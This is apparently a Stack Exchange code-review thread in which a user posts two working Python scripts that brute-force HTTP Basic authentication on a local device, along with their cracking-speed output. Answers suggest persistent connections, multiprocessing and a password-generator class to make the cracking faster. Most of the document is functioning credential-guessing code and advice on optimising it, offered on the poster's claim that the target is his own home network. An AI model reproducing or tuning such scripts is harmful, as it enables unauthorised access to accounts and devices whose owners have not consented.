# Brute force HTTP with Python

Tags: python, performance, http, authentication

I am playing around with brute force attack on my home network. I wrote the following script with Python. However progress is a little slow. Does anyone have a suggestion how to make this faster?

```
import socket
import urllib2, base64
import sys
import time


def afunction(password_start):

    #-------------------------------------------------------------------------- ONLY ONCE
    charset = 'abcdefghijklmnopqrstuvwxyz0123456789'
    request = urllib2.Request("http://192.168.178.25/parse.html")
    num = len(charset)**3
    print "Trying to crack parse.html...\n"

    # STATUS VARIABLES
    totspeed = 0
    c= 0
    total = 36**6

    #GET THE INDEXES TO START WHERE THEY SHOULD
    first_time = True

    ilist = []
    for i in password_start:
        for index, j in enumerate(charset):
            if i == j:
                ilist.append(index)

    #USERNAME
    usrname = 'admin'

    #-------------------------------------------------------------------------- LOOP
    for idx, l in enumerate(charset):
        _q = idx
        if idx < ilist[0] and first_time:
            continue
        for idx2, m in enumerate(charset):
            _w = idx2
            if idx2 < ilist[1] and first_time:
                continue
            for idx3, n in enumerate(charset):
                _e = idx3
                if idx3 < ilist[2] and first_time:
                    continue
                at = time.time()
                for idx4,o in enumerate(charset):
                    if idx4 < ilist[3] and first_time:
                        continue
                    for idx5, p in enumerate(charset):
                        if idx5 < ilist[4] and first_time:
                            continue
                        for idx6, q in enumerate(charset):
                            if idx6 < ilist[5] and first_time:
                                continue

                            #PASSWORD
                            passwd = l+m+n+o+p+q
                            first_time = False

                            #LOGGING IN
                            base64string = base64.encodestring('%s:%s' % (usrname,passwd)).replace('\n', '')
                            request.add_header("Authorization", "Basic %s" % base64string)
                            try:
                                result = urllib2.urlopen(request)
                                print "Login succes!!  Username: %s"%usrname,"   Password: %s"%passwd
                                sys.exit()

                            #EVERY FAILED PASSWORD GOES IN HERE
                            except urllib2.HTTPError:
                                continue

                            #IF A NETWORK ERROR OCCURS, IT WILL BE CAUGHT WITH AN EXCEPTION
                            except socket.error:
                                print "\n Sleeping for a moment. Conncection is reset by peer...\n"
                                time.sleep(60)
                                afunction(passwd)


                            except urllib2.URLError:
                                if time.localtime()[3] < 21:
                                    print "Connection has been lost. Try again in 10 minutes"
                                    start3 = passwd
                                    time.sleep(600)
                                    afunction(passwd)

                                else:
                                    start3 = passwd
                                    print "Connection has been terminated at: %s\n"% time.ctime()
                                    print "Todays cracking ended with: %s"%start3
                                    print "Cracking will continue at 6 AM\n"
                                    while time.localtime()[3] != 6:
                                        time.sleep(600)
                                    time.sleep(300)
                                    afunction(passwd)

                #STATUS UPDATE
                bt = time.time()

                totpasswd = num/((bt-at))
                totspeed +=int(totpasswd)
                c+=1
                average = totspeed / c
                aa = (36-(_q+1) )
                bb = (36-(_w+1) )
                cc = (36-(_e+1) )
                if aa == 0: aa = 1
                if bb == 0: bb = 1
                if cc == 0: cc = 1
                passwordsleft = ( aa * 36**5) +( bb * 36**4) + ( cc * 36**3) + (36**3) + (36**2) + 36.
                estimatation = ((passwordsleft/average) / 3600 ) / 13.
                print usrname,"::::",l+m+n+'xxx',"::::", "  Processed %d passwords / sec"%totpasswd, "::::","  Estimated time left: %d days"%estimatation,"::::","  Passwords Left: %d"%passwordsleft, "::::","  Done: %.2f %%"%((passwordsleft/total)*100)

#RUN SCRIPT
afunction('aziaaa')
```

This is the output:

> ```
> admin :::: fajxx ::::   Processed 737 passwords / sec ::::   Estimated time left: 25 hours ::::   Passwords Left: 52056468 ::::  Done: 13.91 %
> admin :::: fakxx ::::   Processed 648 passwords / sec ::::   Estimated time left: 25 hours ::::   Passwords Left: 52055172 ::::  Done: 13.91 %
> admin :::: falxx ::::   Processed 848 passwords / sec ::::   Estimated time left: 24 hours ::::   Passwords Left: 52053876 ::::  Done: 13.91 %
> admin :::: famxx ::::   Processed 734 passwords / sec ::::   Estimated time left: 23 hours ::::   Passwords Left: 52052580 ::::  Done: 13.91 %
> ```

Following is similar code, but with the httlip library:

```python
import sys
import time
import base64
import string
import httplib

def afunction(password_start):

    #-------------------------------------------------------------------------- ONLY ONCE
    charset = 'abcdefghijklmnopqrstuvwxyz0123456789'
    h = httplib.HTTP('192.168.178.25')
    num = len(charset)**2
    print "Trying to crack parse.html...\n"

    # STATUS VARIABLES
    totspeed = 0
    c= 0
    total = 36**5

    #GET THE INDEXES TO START WHERE THEY SHOULD
    first_time = True

    ilist = []
    for i in password_start:
        for index, j in enumerate(charset):
            if i == j:
                ilist.append(index)

    #USERNAME
    userid = 'admin'

    #-------------------------------------------------------------------------- LOOP
    for idx, l in enumerate(charset):
        _q = idx
        if idx < ilist[0] and first_time:
            continue
        for idx2, m in enumerate(charset):
            _w = idx2
            if idx2 < ilist[1] and first_time:
                continue
            for idx3, n in enumerate(charset):
                _e = idx3
                if idx3 < ilist[2] and first_time:
                    continue
                at = time.time()
                for idx4,o in enumerate(charset):
                    if idx4 < ilist[3] and first_time:
                        continue
                    for idx5, p in enumerate(charset):
                        if idx5 < ilist[4] and first_time:
                            continue

                        #PASSWORD
                        passwd = l+m+n+o+p
                        first_time = False

                        auth = 'Basic ' + string.strip(base64.encodestring(userid + ':' + passwd))

                        h.putrequest('GET', '/parse.html')
                        h.putheader('Authorization', auth )
                        h.endheaders()
                        if h.getreply()[0] == 401:
                            continue
                        elif h.getreply()[0] == 200:
                            print "Login succes!!  Username: %s"%userid,"   Password: %s"%passwd
                            sys.exit()
                        else:
                            print "Conncection lost..."
                            sys.exit()

                #STATUS UPDATE
                bt = time.time()
                dt = bt - at
                totpasswd = num/dt
                totspeed +=int(totpasswd)
                c+=1.
                average = totspeed / c
                aa = (36-(_q+1) )
                bb = (36-(_w+1) )
                cc = (36-(_e+1) )
                if aa == 0: aa = 1
                if bb == 0: bb = 1
                if cc == 0: cc = 1
                passwordsleft = ( aa * 36**4) +( bb * 36**3) + ( cc * 36**2) + (36**2) + 36.
                estimatation = ((passwordsleft/average) / 3600. )
                print userid,"::::",l+m+n+'xx',"::::", "  Processed %d passwords / sec"%totpasswd, "::::","  Estimated time left: %d hours"%estimatation,"::::","  Passwords Left: %d"%passwordsleft, "::::","  Done: %.2f %%"%(100-(((passwordsleft/total))*100))

    print "No password found.. Try something else.... "

#RUN SCRIPT
afunction('aaiaa')
#afunction('a47aaa')
```

The output is considerably slower:

> ```python
> admin :::: aatxx ::::   Processed 34 passwords / sec ::::   Estimated time left: 380 hours ::::   Passwords Left: 60441588 ::::  Done: 0.04 %
> admin :::: aauxx ::::   Processed 30 passwords / sec ::::   Estimated time left: 389 hours ::::   Passwords Left: 60440292 ::::  Done: 0.04 %
> admin :::: aavxx ::::   Processed 28 passwords / sec ::::   Estimated time left: 399 hours ::::   Passwords Left: 60438996 ::::  Done: 0.04 %
> ```

Comment: Instead of that nested mess of for-loops, check out [itertools](http://docs.python.org/library/itertools.html) ; I suspect a usage of [.product()](http://docs.python.org/library/itertools.html#itertools.product) is what you want.

Answer (score 4):

- move the code that generates passwords and makes connections, retry logic  to separate functions
- make multiple requests using the same tcp connection (urllib doesn't support persistent connections, you could use httplib directly instead)
- make multiple connections in parallel (using threads/processes and/or some async library e.g., [`requests.async`](http://docs.python-requests.org/)

Here's the code: [Brute force basic http authorization using httplib and multiprocessing](https://gist.github.com/zed/0a8860f4f9a824561b51).

Comment: ok. I tried with threads before though, but its considerably slower. let me try to find the code and i'll post it. I'll have a look to your other suggestions. thanks!

Comment: Well as you can see, I tried to implement the httplib library but the code is remarkably slower. Is the "h = httplib.HTTP('192.168.178.25')" taking care of the same tcp connection as you suggested?

Comment: @apfz: [httplib + multiprocessing](https://gist.github.com/0a8860f4f9a824561b51) processes ~1100 passwords per second (the server produces max ~1200 replies/s without errors).

Comment: that is a really really nice pythonic code you linked me to. Your help is greatly appreciated, as I have learned much about Python this way. I got a similar passwords/sec as with the code I posted, I guess thats about the limit my network can go then. Again, thanks for being really helpful!

Comment: @apfz: [I've cleaned up the code slightly](https://gist.github.com/0a8860f4f9a824561b51). You could tweak number of processes in the pool until passwords/sec rate levels off.

Answer (score 4):

```
import sys
import time
import base64
import string
import httplib

def afunction(password_start):
```

That's a pretty inspecific name for your function

```
    # ONLY ONCE
    charset = 'abcdefghijklmnopqrstuvwxyz0123456789'
    h = httplib.HTTP('192.168.178.25')
```

I'd put constants like charset and the ip address into global c onstants.

```
    num = len(charset)**2
```

The name `num` is not very specific, so its hard to tell what this is supposed to be. Its also not used until much later, so why define it here?

```
    print "Trying to crack setparm.htm...\n"

    # STATUS VARIABLES
    totspeed = 0
    c= 0
```

The speed of light? Don't use single letter variables unless maybe inside quick for loops

```
    total = 36**5
```

Why not use `len(charset)` here?

```
    #GET THE INDEXES TO START WHERE THEY SHOULD
    first_time = True

    ilist = []
    for i in password_start:
        for index, j in enumerate(charset):
            if i == j:
                ilist.append(index)
```

Actually this whole list can be written as `ilist = [charset.index(char) for char in password_start]`

```
    #USERNAME
    userid = 'admin'
```

I'd make this a global constnat

```
    #-------------------------------------------------------------------------- LOOP
    for idx, l in enumerate(charset):
        _q = idx
```

Why store it in `idx` only to copy it over? Use `for _q, l in ...`

```
        if idx < ilist[0] and first_time:
            continue
        for idx2, m in enumerate(charset):
            _w = idx2
            if idx2 < ilist[1] and first_time:
                continue
            for idx3, n in enumerate(charset):
                _e = idx3
                if idx3 < ilist[2] and first_time:
                    continue
                at = time.time()
                for idx4,o in enumerate(charset):
                    if idx4 < ilist[3] and first_time:
                        continue
                    for idx5, p in enumerate(charset):
                        if idx5 < ilist[4] and first_time:
                            continue
```

Yuck! You shouldn't to have nested for loops like this. I'll show you how to rewrite it later.

```
                        #PASSWORD
                        passwd = l+m+n+o+p
                        first_time = False

                        auth = 'Basic ' + string.strip(base64.encodestring(userid + ':' + passwd))

                        h.putrequest('GET', '/protect/setvar.htm')
                        h.putheader('Authorization', auth )
                        h.endheaders()
                        if h.getreply()[0] == 401:
                            continue
                        elif h.getreply()[0] == 200:
                            print "Login succes!!  Username: %s"%userid,"   Password: %s"%passwd
                            sys.exit()
                        else:
                            print "Conncection lost..."
                            sys.exit()
```

You may to include more information about what error happened. This whole section is ripe for being moved into another function

```
                #STATUS UPDATE
                bt = time.time()
                dt = bt - at
                totpasswd = num/dt
                totspeed +=int(totpasswd)
```

Why are you adding speeds rather then just tracking time from the start?
                    c+=1.
                    average = totspeed / c
                    aa = (36-(_q+1) )
                    bb = (36-(_w+1) )
                    cc = (36-(_e+1) )
                    if aa == 0: aa = 1
                    if bb == 0: bb = 1
                    if cc == 0: cc = 1
                    passwordsleft = ( aa * 36**4) +( bb * 36**3) + ( cc * 36**2) + (36**2) + 36.
                    estimatation = ((passwordsleft/average) / 3600. )
                    print userid,"::::",l+m+n+'xx',"::::", "  Processed %d passwords / sec"%totpasswd, "::::","  Estimated time left: %d hours"%estimatation,"::::","  Passwords Left: %d"%passwordsleft, "::::","  Done: %.2f %%"%(100-(((passwordsleft/total))*100))

```
    print "No password found.. Try something else.... "

#RUN SCRIPT
afunction('aaiaa')
#afunction('a47aaa')
```

For generating the objects, I'd use a class liek this:

```
class PasswordGenerator(object):
    def __init__(self, password_start):
        self._state = [CHARSET.index(char) for char in password_start]

    def __iter__(self):
        return self

    def next(self):
        # convert indexes in password string
        password = ''.join(CHARSET[index] for index in self._state)

        # try incrementing the password state, starting at the last char
        for index in range(len(self._state) - 1, 0, -1):
            self._state[index] += 1

            if self._state[index]  == len(CHARSET):
                # if we've tried all the characters in the last position
                # reset and continue
                self._state[index] = 0
            else:
                # we're good, return the password
                return password
        else:
            # signal the end of passwords
            raise StopIteration

    def count(self):
        """
        Return the number of passwords not yet generated
        """
        total = 0
        for index, count in enumerate(self._state):
            total += (len(CHARSET) - count)*len(CHARSET)**(len(self._state)- index)
        return total
```

Lightly tested. The idea is that this object can generate the passwords of any length, and you use a single for loop instead of several nested ones.

I also tried using eventlet to speed up the processing. The idea is to use multiple requests at the same time. But this in my case made things slower. I speculate this is because I'm justting a localhost server on my desktop, and thus I'm not spending a lot of time waiting for network traffic.

Comment: Some Python masters here at stackexchange. Thanks a lot! Your tips are really straightforward, will not make these mistakes again! I realise now to make the variables a bit more clearer before I post as well. Thanks for helping me out!

Comment: Are you sure you need a class? Using `yield` would simplify the code immensely, but you would not be able to implement `count`... it is up to you if it is worth the tradeoff